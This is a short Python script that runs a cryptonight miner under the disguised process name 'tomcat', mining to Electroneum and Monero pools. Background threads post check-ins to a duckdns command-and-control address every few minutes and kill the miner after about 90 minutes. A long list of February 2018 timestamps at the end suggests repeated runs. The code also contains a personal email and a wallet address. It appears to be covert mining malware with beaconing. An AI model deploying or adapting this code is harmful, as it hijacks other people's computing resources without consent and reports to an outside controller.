import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:42:04.682712
#2018-02-17 16:28:07.557105
#2018-02-17 18:16:01.235725
#2018-02-17 20:02:06.539293
#2018-02-17 21:50:07.614104
#2018-02-17 23:35:05.716171
#2018-02-18 01:24:05.344404
#2018-02-18 03:12:01.859159
#2018-02-18 04:59:01.698161
#2018-02-18 06:51:03.807519
#2018-02-18 08:39:07.398713
#2018-02-18 10:25:03.483495
#2018-02-18 12:11:04.183842
#2018-02-18 13:57:03.471388
#2018-02-18 15:47:01.851235
#2018-02-18 17:38:05.537418
#2018-02-18 19:26:06.410403
#2018-02-18 21:12:06.743854
#2018-02-18 22:58:05.759563
#2018-02-19 00:46:06.450534
#2018-02-19 02:33:06.750504
#2018-02-19 04:19:02.211076
#2018-02-19 06:04:01.673969
#2018-02-19 07:52:06.080683
#2018-02-19 09:42:07.817499
#2018-02-19 11:32:09.218722
#2018-02-19 13:19:09.283632
#2018-02-19 15:07:08.945146
#2018-02-19 16:55:10.070120
#2018-02-19 18:43:08.350331
#2018-02-19 20:32:01.478438
#2018-02-19 22:20:05.293470
#2018-02-20 00:06:01.272180
#2018-02-20 01:54:06.324335
#2018-02-20 03:42:07.958156
#2018-02-20 05:29:04.240974
#2018-02-20 07:13:06.018689
#2018-02-20 08:58:04.448999
#2018-02-20 10:42:04.069255
#2018-02-20 12:28:01.669739
#2018-02-20 14:14:08.123800
#2018-02-20 15:59:07.968426
#2018-02-20 17:46:06.659545
#2018-02-20 19:34:06.479194
#2018-02-20 21:22:07.120948
#2018-02-20 23:08:05.826694
#2018-02-21 00:53:07.401721
#2018-02-21 02:38:05.415663
#2018-02-21 04:26:05.516720
#2018-02-21 06:14:01.407565
#2018-02-21 08:00:04.106695
#2018-02-21 11:01:01.870682
#2018-02-21 12:49:02.135241
#2018-02-21 14:36:08.784791
#2018-02-21 16:23:02.184988
#2018-02-21 18:14:07.134626
#2018-02-21 20:00:10.755987
#2018-02-21 21:47:05.024633
#2018-02-21 23:34:07.228746
#2018-02-22 01:24:05.509951
#2018-02-22 03:12:05.413979
#2018-02-22 04:57:05.960014
#2018-02-22 06:40:07.934687
#2018-02-22 08:28:05.865406
#2018-02-22 10:15:07.331820
#2018-02-22 12:01:05.629785
#2018-02-22 13:47:04.146889
#2018-02-22 15:35:09.206416
#2018-02-22 17:21:01.749417
#2018-02-22 19:08:05.680851
#2018-02-22 21:01:07.432791
#2018-02-22 22:46:08.368773
#2018-02-23 00:33:03.581767
#2018-02-23 02:19:01.521446
#2018-02-23 04:08:01.486484
#2018-02-23 05:52:03.930048
#2018-02-23 07:42:02.303749
#2018-02-23 09:44:06.429910
#2018-02-23 11:51:05.631043
#2018-02-23 13:41:06.689046
#2018-02-23 15:31:07.843010
#2018-02-23 17:21:04.135736
#2018-02-23 19:06:06.490143
#2018-02-23 20:51:01.926203
#2018-02-23 22:36:03.707803
#2018-02-24 00:22:07.791418
#2018-02-24 02:14:01.535758
#2018-02-24 04:04:08.002460
#2018-02-24 05:52:01.599306
#2018-02-24 07:41:01.687074
#2018-02-24 09:26:04.271560
#2018-02-24 11:19:06.269915
#2018-02-24 13:08:07.722539
#2018-02-24 14:59:06.132779
#2018-02-24 16:49:04.934308
#2018-02-24 18:37:06.289557
#2018-02-24 20:28:05.854308
#2018-02-24 22:24:06.312435
#2018-02-25 02:27:05.870804
#2018-02-25 06:07:01.904103
#2018-02-25 11:38:06.834184